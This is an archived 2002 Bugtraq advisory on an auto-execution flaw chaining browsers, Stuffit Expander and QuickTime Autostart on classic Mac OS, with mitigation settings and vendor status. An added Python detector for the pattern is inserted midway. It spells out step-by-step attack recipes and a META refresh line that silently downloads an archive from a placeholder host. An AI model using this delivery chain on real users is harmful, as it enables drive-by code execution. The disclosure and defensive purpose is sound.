Auto file execution vulnerability in Mac OS

From: vm_converter (vm_converterat_private)
Date: Wed Feb 27 2002 - 01:31:24 PST


    Auto file execution vulnerability in Mac OS
    <http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html>
    
    [Overview]
    We found a vulnerability in Mac OS and in Mac OS X with the Classic
    Environment.
    If a victim merely browses a malicious web page:
    
    1. The browser automatically starts downloading a compressed disk-image
       file that contains a malicious program.
    2. An archiver such as Stuffit Expander automatically expands the
       compressed file and mounts the disk image.
    3. Mac OS (QuickTime) executes the malicious program contained in the
       disk image. Whether it does depends on the QuickTime settings.
    
    These three steps run fully automatically and finish in an instant.
    
    [Detail]
    The vulnerability we found rests on three underlying vulnerabilities and
    arises from complex interactions between several pieces of software.
    To explain it, we summarize those three vulnerabilities below.
    ----------------------------------------------------------------------
       --Vuln.1 (already announced at Bugtraq)
       "Macintosh IE file execution vulnerability" [BugTraq] 2002 Jan.22
        from Jass Seljamaa
    
        In that post he reports the vulnerable systems as "IE 5.0, probably
        earlier, on Classic systems (below OS X)"; however, the vulnerable
        systems we found are:
         --Microsoft Internet Explorer 5.0 through 5.1.3
         --iCab Pre 2.7 and 2.7.1
    
       This means malicious users can execute local programs on a Macintosh
       by means of web pages. But they can only execute programs whose full
       file path on the Macintosh is known to the malicious user.
    ----------------------------------------------------------------------
       --Vuln.2 (probably announced in Japan only)
       The day after Vuln.1 was reported, a Japanese user, Mr. Mori,
       presented another vulnerability related to Vuln.1 at "Security Hole
       memo".
    <http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie>
      (written in Japanese)
    
        This vulnerability, similar to Vuln.1, is observed when a web page
        that uses the META tag below is browsed.
    
       <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/some.sit">
    
       After such a page is browsed, the malicious program is downloaded
       automatically.
       So malicious users who combine Vuln.1 and Vuln.2 can force victims to
       download the program and execute it.
       But to force execution of the program, the malicious user must know
       the full file path of the download folder on the victim's Macintosh.
    
         vulnerable browsers (in our test) :
             Microsoft Internet Explorer 4.5 through 5.1.3
             Netscape Communicator 4.78
             Netscape 6.2*1
             Mozilla 0.9.7*1
             iCab Pre 2.7 and 2.7.1
             Opera 5.0
             OmniWeb 4.0.6 and 4.1beta11
            *1: Netscape 6.2 and Mozilla show a dialog before download.
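    A defender-side check for the META refresh delivery pattern described in Vuln.2, added here as an example and not part of the original advisory: it scans a fetched page for refresh targets whose file type Stuffit Expander would expand or mount automatically. The sample page, the host name example.invalid and the extension list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# File types the advisory reports Stuffit Expander expands automatically after
# a download (and, for a disk image inside the archive, auto-mounts). The list
# is an assumption drawn from the extensions named on the page.
AUTO_HANDLED_EXTS = (".sit", ".hqx", ".bin", ".img")

_META_RE = re.compile(r"<meta\b[^>]*>", re.IGNORECASE | re.DOTALL)
_ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                      re.IGNORECASE)

def _attrs(tag):
    """Attributes of one <meta ...> tag as a dict with lower-cased keys."""
    out = {}
    for m in _ATTR_RE.finditer(tag):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out

def parse_refresh(content):
    """Split a refresh CONTENT value like '1;URL=http://h/x.sit' into (delay, url)."""
    delay, _, rest = content.partition(";")
    rest = rest.strip()
    if rest.lower().startswith("url="):
        rest = rest[4:].strip().strip("'\"")
    try:
        seconds = float(delay.strip() or 0)
    except ValueError:
        seconds = None
    return seconds, (rest or None)

def find_auto_downloads(html):
    """Refresh targets whose path ends in a type Stuffit Expander would handle."""
    hits = []
    for tag in _META_RE.findall(html):
        attrs = _attrs(tag)
        if attrs.get("http-equiv", "").lower() != "refresh" or "content" not in attrs:
            continue
        seconds, url = parse_refresh(attrs["content"])
        if url and urlsplit(url).path.lower().endswith(AUTO_HANDLED_EXTS):
            hits.append({"delay": seconds, "url": url})
    return hits

# Constructed sample page: one refresh to an archive (flagged), one ordinary
# refresh to an HTML page, and an unrelated meta tag. example.invalid is a
# placeholder host.
SAMPLE_PAGE = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://example.invalid/some.sit">
<meta http-equiv="Refresh" content="5; url='http://example.invalid/index.html'">
<meta name="description" content="nothing to see here">
</head><body>Loading...</body></html>"""
```

    Run `find_auto_downloads` over pages captured by a proxy or crawler; a hit means the page would trigger a download that the listed browsers start without asking.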
    ----------------------------------------------------------------------
       --Vuln. 3 (found by us, probably announced in Japan only)
       Building on Vuln.1 and 2, we found another vulnerability: malicious
       users can launch arbitrary programs without knowing the full file path.
    
         Step 1 : Make a disk image that contains the malicious program.
         Step 2 : Compress this disk image file into *.sit form. (*.hqx and
                  *.bin are also effective.)
         Step 3 : Upload this *.sit file to some website and prepare a web
                  page using Vuln.1 and 2.
         Step 4 : When victims browse the web page, the *.sit file is
                  downloaded automatically.*
         Step 5 : Stuffit Expander automatically extracts the *.sit file and
                  mounts the disk image.
         Step 6 : The malicious program in the disk image is executed
                  automatically by the browser.*
         *Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.
    
       Because the program lives on a disk image, whose volume name the
       malicious user chooses, the file path of the download folder no
       longer matters. Only the malicious program and the web pages need to
       be prepared.
       In this vulnerability Stuffit Expander plays an important role: it
       performs the automatic extraction and auto-mounts the disk image.
       Then, by way of Vuln.1, the browser executes the program.
    
         vulnerable systems (in our test) :
             Stuffit Expander 5.x through 6.5.1 for Mac OS
             Stuffit Expander 6.5 or higher version for Mac OS X*1
             Microsoft Internet Explorer 5.0 through 5.1.3
             iCab Pre 2.7 and 2.7.1
             *1: Stuffit Expander 6.0 for X is not affected.
    
    We made a test page for this vulnerability. Please try it.
    http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/
    
    ----------------------------------------------------------------------
    Auto file execution vulnerability in Mac OS
    ----------------------------------------------------------------------
    
    Building on Vuln.1 to Vuln.3, we now explain the "Auto file execution
    vulnerability in Mac OS".
    The vulnerability we found uses Vuln.2 and 3, but not Vuln.1.
    It is caused by complex interactions between several pieces of software:
    browsers (and network clients), Stuffit Expander and QuickTime. It is
    similar to the computer virus "AutoStart 9805", which used QuickTime's
    "Autostart CD-ROMs" feature. In this way, as with Vuln.3, malicious users
    can launch arbitrary programs without knowing the full file path.
    
       Step 1 : Make a disk image that contains an "autostart" malicious
                program.
       Step 2 : Compress this disk image file into *.sit form. (*.hqx and
                *.bin are also effective.)
       Step 3 : Upload this *.sit file to some website and prepare a web
                page using Vuln. 2.
       Steps 4 and 5 are the same as in Vuln. 3.
       Step 6 : The program in the image is executed automatically by
                QuickTime's "Autostart CD-ROMs" feature.
    
    In this vulnerability,
       1. the browser downloads the *.sit by way of Vuln.2;
       2. then Stuffit Expander performs the automatic extraction and
          auto-mounts the disk image;
       3. and then QuickTime executes the program in the image.
    These are the default settings of each component; it is teamwork. One
    click on a web page is enough to start automatic download, extraction,
    mounting and execution.
    Furthermore, if victims manually download the malicious disk image with a
    browser or another network client (such as Fetch via FTP), automatic
    extraction, mounting and execution will start just the same.
    
       vulnerable systems :
          Mac OS 9.x, and Mac OS X with the Classic environment*1
          (probably System 7.5.x or higher)
          QuickTime 2.0 or higher version (probably)*2
          Stuffit Expander 5.x or higher version for Mac OS
          Stuffit Expander 6.5 or higher version for Mac OS X*3
          All browsers and network clients that use Stuffit Expander as a
          post-process for downloads*4
          *1: Mac OS X used on its own is not affected.
          *2: "Autostart CD-ROMs" has been supported since QuickTime 2.0.
          *3: Stuffit Expander 6.0 for X is not affected.
          *4: Netscape 6.x and Mozilla show a dialog before download.
          *4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.
          *4: We've tested Fetch 3.0.3, NetFinder v2.3.1 and Vicomsoft FTP
                Client 3.0.1. These are vulnerable.
    
    [Exploit]
    We made a test page for this vulnerability. Please try it.
    <http://www.u-struct.com/diary/img/20020131_OSissue_E/>
    
    When your system meets the conditions, "Exploit_HD_OSX.img.sit" is
    downloaded and extracted, the disk image "Exploit_HD_OSX" is mounted,
    and the application "openTrash" is launched automatically.
    "openTrash" is an application that displays the message "This
    application opens trash only" and then opens the Trash, nothing more.
    
    [Solutions]
    Change the default settings of each component as listed below.
    
    In Mac OS :
    ++required settings
       - "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.
       - Stuffit Expander > preferences > Disk images > "Mount Disk Images"
          > turn off.
       - Change the default volume name (e.g. Macintosh HD) to something else.
       - Change the default "Download Folder" (e.g. Desktop Folder) of your
         browsers to another folder.
    ++more secure settings (not required)
       - Stuffit Expander > preferences > Expanding > "Continue to expand"
          > turn off.
       - Each browser and network client > its preferences > change the
         download setting that hands files to Stuffit Expander as a
         post-process to "save to file".
       - Each browser > its preferences > change the download setting to
         "disable" *
        * e.g. in Internet Explorer, set the "Security Zones" to "high"
           or "custom" (File downloads set to "Disable").
    
    In Mac OS X with the Classic environment :
      - Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"
        > turn off.*
      - The others are the same as in Mac OS.
       * "Autostart CD-ROMs" is governed by Classic's "QuickTime setting".
           So when the Classic environment is not booted, Mac OS X is not
           affected.
    
    Please refer to the following URL for more detailed solutions.
    <http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html>
    
    [vendor status]
    - mozilla.org (Bugzilla)
       They have marked our report as "security sensitive".
    <http://bugzilla.mozilla.org/show_bug.cgi?id=123152>
    
    - icab.de
       A Japanese iCab user (not us) has already reported this to icab.de.
       They replied regarding solutions and have indicated they will address
       it. (But there is no information about it on their web site yet.)
    
    - microsoft.com and microsoft.co.jp
       They have indicated they will address Vuln.1.
       (But there is no information about it on their web site yet.)
    
    - other vendors
       no reply, or only an auto-reply
    ----------------------------------------------------------------------
    [comment]
    We reported to the related vendors* on Feb. 3, and are contributing this
    vulnerability to BugTraq regardless of the vendors' responses, because
    we have already announced it in Japan, on our web site and on the
    "Security Hole memo ML".
    Probably thousands of Japanese users already know of this vulnerability.
    
    (these are in Japanese Language)
    <http://www.u-struct.com/diary/view.cgi?ID=s20020128002516>
    <http://homepage.mac.com/vm_converter/200202_diary.html#20020128_AutoStart_vuln>
    <http://memo.st.ryukoku.ac.jp/archive/200202.month/2846.html>
    
    *:apple.com, apple.co.jp, microsoft.com, microsoft.co.jp,
    aladdinsys.com, act2.co.jp, netscape.com, netscape.co.jp,
    mozilla.org (Bugzilla), icab.de, omnigroup.com, opera.com.
    
    [credit]
    
    vm_converter <vm_converterat_private>
    FUJII Taiyo <taiyoat_private>
    



    This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 15:24:45 PST